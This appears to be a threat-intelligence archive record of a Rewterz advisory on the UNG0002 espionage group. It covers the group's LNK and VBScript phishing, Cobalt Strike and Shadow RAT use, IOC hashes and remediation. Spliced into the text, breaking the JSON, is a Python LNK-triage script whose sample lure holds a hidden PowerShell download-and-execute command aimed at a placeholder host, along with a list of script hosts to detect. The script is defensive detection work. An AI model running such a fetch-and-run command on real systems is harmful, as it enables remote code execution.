{
	"id": "975be886-7b85-4711-b324-583e2928575f",
	"created_at": "2026-04-06T00:16:46.555608Z",
	"updated_at": "2026-04-10T03:28:40.150447Z",
	"deleted_at": null,
	"sha1_hash": "e7de273bb8909c7ebc218f095072d305af6fc4bb",
	"title": "APT UNG0002 Expands Cyber Espionage Campaigns Across Asia - Active IOCs - Rewterz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 262540,
	"plain_text": "APT UNG0002 Expands Cyber Espionage Campaigns Across Asia - Active IOCs - Rewterz\r\nPublished: 2025-07-23 · Archived: 2026-04-02 12:33:25 UTC\r\nSeverity\r\nHigh\r\nAnalysis Summary\r\nCyber espionage in Asia is intensifying as researchers from a security firm have revealed new details on UNG0002, also known as Unknown Group 0002. This technically adept yet obscure group is conducting large-scale campaigns against strategic sectors across China, Hong Kong, and Pakistan. Its targets span defense, electrical engineering, energy infrastructure, civil aviation, healthcare, universities, IT enterprises, and even the video game sector.\r\nAccording to the security firm's latest report, UNG0002 favours LNK shortcuts, VBScript files, and post-exploitation frameworks such as Cobalt Strike and Metasploit. The group lures victims with decoy documents disguised as résumés, which lend authenticity to its phishing emails. The researcher's analysis highlights the group's methodical approach and adaptability.\r\nUNG0002 has run two major campaigns: Cobalt Whisper (May–September 2024) and AmberMist (January–May 2025). Both relied heavily on phishing emails delivering malicious ZIP archives and LNK files to start multi-stage malware deployment chains.\r\nThe Cobalt Whisper campaign, first identified in October 2024, used ZIP attachments containing LNK and VBScript files. Once executed, these deployed Cobalt Strike modules, giving the attackers command and control over the compromised systems.\r\nIn the AmberMist campaign, the attackers distributed fake résumés as LNK files that start a multi-stage infection process culminating in the deployment of the INET RAT and Blister DLL trojans.
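The ZIP-plus-LNK delivery chain described above is easy to triage mechanically: a Shell Link file stores its target and command-line arguments in fixed StringData fields, so a parser can pull out what the shortcut would actually run before anyone double-clicks it. The following Python is an added example written for this advisory; it is not code from Rewterz, the security firm, or UNG0002. The sample archive, the LNK it contains, the hxxp://example.invalid URL and the SCRIPT_HOSTS list are all constructed assumptions for the demonstration; the field layout follows the MS-SHLLINK specification and works for any LNK, not only résumé lures.

```python
'''Triage a ZIP attachment for LNK shortcuts that launch a script host.

Added example (not code from the advisory or from UNG0002). It builds a minimal
Shell Link file in memory, zips it next to a decoy, then parses every .lnk in the
archive and flags those whose target or arguments invoke a script interpreter.
Field layout follows MS-SHLLINK; only the StringData fields are decoded.
'''
import io
import struct
import zipfile

LNK_HEADER_SIZE = 0x4C
# Fixed LinkCLSID 00021401-0000-0000-C000-000000000046 as stored on disk (little-endian)
LNK_CLSID = bytes.fromhex('0114020000000000c000000000000046')

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# Interpreters and LOLBins commonly launched from lure shortcuts (assumption: tune per environment)
SCRIPT_HOSTS = ('powershell', 'pwsh', 'cmd.exe', 'cscript', 'wscript', 'mshta', 'rundll32', 'regsvr32')


def _string_data(buf, offset, unicode):
    '''Decode one StringData entry: u16 character count followed by the characters.'''
    count = struct.unpack_from('<H', buf, offset)[0]
    offset += 2
    if unicode:
        end = offset + count * 2
        return buf[offset:end].decode('utf-16-le'), end
    end = offset + count
    return buf[offset:end].decode('latin-1'), end


def parse_lnk(buf):
    '''Return the StringData fields of a Shell Link; LinkTargetIDList and LinkInfo are skipped over.'''
    if len(buf) < LNK_HEADER_SIZE or struct.unpack_from('<I', buf, 0)[0] != LNK_HEADER_SIZE or buf[4:20] != LNK_CLSID:
        raise ValueError('not a Shell Link file')
    flags = struct.unpack_from('<I', buf, 0x14)[0]
    offset = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        offset += 2 + struct.unpack_from('<H', buf, offset)[0]  # IDListSize excludes its own 2 bytes
    if flags & HAS_LINK_INFO:
        offset += struct.unpack_from('<I', buf, offset)[0]      # LinkInfoSize includes itself
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for bit, name in ((HAS_NAME, 'name'), (HAS_RELATIVE_PATH, 'relative_path'),
                      (HAS_WORKING_DIR, 'working_dir'), (HAS_ARGUMENTS, 'arguments'),
                      (HAS_ICON_LOCATION, 'icon_location')):
        if flags & bit:
            fields[name], offset = _string_data(buf, offset, unicode)
        else:
            fields[name] = ''
    return fields


def is_suspicious(fields):
    '''True when the shortcut target or its arguments name a script host.'''
    cmd = (fields['relative_path'] + ' ' + fields['arguments']).lower()
    return any(host in cmd for host in SCRIPT_HOSTS)


def triage_zip(zip_bytes):
    '''Return {member name: (fields, suspicious)} for every .lnk inside the archive.'''
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith('.lnk'):
                fields = parse_lnk(zf.read(info))
                results[info.filename] = (fields, is_suspicious(fields))
    return results


def build_sample_lnk(relative_path, arguments):
    '''Constructed sample: minimal Unicode .lnk carrying only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS.'''
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack('<I', LNK_HEADER_SIZE) + LNK_CLSID + struct.pack('<I', flags)
    header += bytes(LNK_HEADER_SIZE - len(header))  # attributes, timestamps, sizes, hotkey, reserved: all zero
    body = b''
    for text in (relative_path, arguments):
        body += struct.pack('<H', len(text)) + text.encode('utf-16-le')
    return header + body


def build_sample_zip():
    '''Constructed resume-themed archive (not a real UNG0002 sample): one lure LNK, one benign LNK, one decoy.'''
    lure = build_sample_lnk('..\\..\\..\\Windows\\System32\\cmd.exe',
                            '/c powershell -nop -w hidden -ep bypass -c iex(irm hxxp://example.invalid/stage1)')
    benign = build_sample_lnk('..\\Documents\\Report.docx', '')
    out = io.BytesIO()
    with zipfile.ZipFile(out, 'w') as zf:
        zf.writestr('Resume_Candidate.pdf.lnk', lure)
        zf.writestr('Report.lnk', benign)
        zf.writestr('Resume_Candidate.pdf', b'%PDF-1.4 decoy')
    return out.getvalue()


if __name__ == '__main__':
    for name, (fields, bad) in triage_zip(build_sample_zip()).items():
        print(('SUSPICIOUS ' if bad else 'ok         ') + name, fields['relative_path'], fields['arguments'])
```

Running the file prints one line per shortcut in the constructed archive, flagging the résumé lure and leaving the benign document shortcut alone. In a mail-gateway or sandbox hook, triage_zip would be fed the raw attachment bytes instead of build_sample_zip(); the parser tolerates shortcuts that carry a LinkTargetIDList or LinkInfo block by skipping them, but it deliberately does not decode them, so a shortcut whose only target lives in the IDList (no RELATIVE_PATH) will show an empty path and should be escalated rather than cleared.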
INET RAT is believed to be a customized variant of the Shadow RAT spyware, while Blister DLL acts as a shellcode loader used to establish remote access.\r\nhttps://rewterz.com/threat-advisory/apt-ung0002-expands-cyber-espionage-campaigns-across-asia-active-iocs\r\nPage 1 of 4\r\nA notable variant observed in January 2025 redirected victims to a spoofed Pakistan Ministry of Maritime Affairs website. Masquerading as a CAPTCHA verification page, it used the ClickFix technique, in which the visitor is tricked into running a PowerShell command themselves, to activate Shadow RAT and establish covert communication with command-and-control servers.\r\nShadow RAT is loaded through DLL sideloading and supports remote command execution, making it stealthy and difficult to detect. Despite exposure of its tools, UNG0002 continues to refine its toolkit and expand its infrastructure.\r\nAlthough direct attribution remains unconfirmed, circumstantial evidence suggests UNG0002 may originate from South or Southeast Asia. Analysts describe the group as resilient and inventive, and note the continued effectiveness of phishing, spoofed sites, and DLL sideloading in strategic cyber espionage campaigns that are likely to intensify further.\r\nImpact\r\nCommand Execution\r\nUnauthorized Access\r\nCyber Espionage\r\nIndicators of Compromise\r\nMD5\r\n76c6694bb3446752f305376f212aca32\r\nf5a9c3ec6b00cea79eae2f9b9a808f5f\r\n35fe5143d83829bb574e8021d47187ab\r\na8a7e7494b9ded05685d6b91b1b7ffa6\r\nab5aeb2f25745580b80d7326bcecc620\r\nbba575d4a89f285cf8c0650be09cc12e\r\n7a2b0d8860a7188a936275907785d421\r\na1fdb6d4220598e0f394e0a850343fe9\r\n309f84937dc4e489517f5cbe1193538a\r\n3992f53bb3d217900a56eec7f656b909\r\n35bf8a85d61ec695fcaec19b6e25e1ca\r\n2d2dc4dbefa47b9ac563a0f9fd65929f\r\nSHA-256\r\n4ca4f673e4389a352854f5feb0793dac43519ade8049b5dd9356d0cbe0f06148\r\n55dc772d1b59c387b5f33428d5167437dc2d6e2423765f4080ee3b6a04947ae9\r\n4b410c47465359ef40d470c9286fb980e656698c4ee4d969c86c84fbd012af0d\r\nc49e9b556d271a853449ec915e4a929f5fa7ae04da4dc714c220ed0d703a36f7\r\nad97b1c79735b1b97c4c4432cacac2fce6316889eafb41a0d97f2b0e565ee850\r\nc722651d72c47e224007c2111e0489a028521ccdf5331c92e6cd9cfe07076918\r\n2140adec9cde046b35634e93b83da4cc9a8aa0a71c21e32ba1dce2742314e8dc\r\n2c700126b22ea8b22b8b05c2da05de79df4ab7db9f88267316530fa662b4db2c\r\nc3ccfe415c3d3b89bde029669f42b7f04df72ad2da4bd15d82495b58ebde46d6\r\n4c79934beb1ea19f17e39fd1946158d3dd7d075aa29d8cd259834f8cd7e04ef8\r\n2bdd086a5fce1f32ea41be86febfb4be7782c997cfcb028d2f58fee5dd4b0f8a\r\n90c9e0ee1d74b596a0acf1e04b41c2c5f15d16b2acd39d3dc8f90b071888ac99\r\nSHA1\r\nab774153c0fe0e968f57df3bdc209612056b0ad4\r\n302bebfa44e4c04baab423ac798997fb87b8d1a2\r\nbf5b9e0c4f2497a0e501dba361c94a5e401ad135\r\ne28ff664767b55373f43c909cab287b471b5a9dd\r\nbf76ae47197bd947c2d7e582aa2a565ad6beaed2\r\na42dfab48fb50fed3a560f0e272d5aa49a09d2b2\r\nfee6bab9751d24a3f0171c6c72c67010d262adf3\r\n98ea070e684ce6e8fea1ee60a1dc9a7115187826\r\n87df9a5dcf7d18816eadff78aff242f0cc7a04cc\r\na9ad4f730cc37aeef7c0368638e7e732f13bfa31\r\n98008af4ab20fbc6234af6bf9b27d698accca4d4\r\n23382a69715a8e597d7ff605b9e41ef0f64b9897\r\nRemediation\r\nUpdate and patch systems regularly to close vulnerabilities that post-exploitation tools such as Cobalt Strike and Metasploit can leverage\r\nImplement strong email security gateways to detect and block phishing emails with 
malicious ZIP or LNK attachments\r\nTrain employees to recognise deceptive résumés and suspicious email attachments to reduce phishing success\r\nRestrict execution of LNK, VBScript, and PowerShell files through endpoint protection policies\r\nMonitor network traffic for connections to known C2 infrastructure and unusual beaconing behaviour\r\nDeploy endpoint detection and response (EDR) solutions to detect post-exploitation tools and RAT activity\r\nUse application whitelisting to prevent unauthorized scripts and shellcode loaders from executing\r\nRegularly review and harden web infrastructure to prevent spoofing or redirection attacks\r\nEnable multi-factor authentication to limit the impact of compromised credentials\r\nConduct threat hunting focused on DLL sideloading and living-off-the-land techniques used by UNG0002\r\nSource: https://rewterz.com/threat-advisory/apt-ung0002-expands-cyber-espionage-campaigns-across-asia-active-iocs",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://rewterz.com/threat-advisory/apt-ung0002-expands-cyber-espionage-campaigns-across-asia-active-iocs"
	],
	"report_names": [
		"apt-ung0002-expands-cyber-espionage-campaigns-across-asia-active-iocs"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "fa8f111a-5ace-4234-a4f7-07ce2b429606",
			"created_at": "2026-02-07T02:00:03.663624Z",
			"updated_at": "2026-04-10T02:00:03.960722Z",
			"deleted_at": null,
			"main_name": "UNG0002",
			"aliases": [],
			"source_name": "MISPGALAXY:UNG0002",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434606,
	"ts_updated_at": 1775791720,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e7de273bb8909c7ebc218f095072d305af6fc4bb.pdf",
		"text": "https://archive.orkl.eu/e7de273bb8909c7ebc218f095072d305af6fc4bb.txt",
		"img": "https://archive.orkl.eu/e7de273bb8909c7ebc218f095072d305af6fc4bb.jpg"
	}
}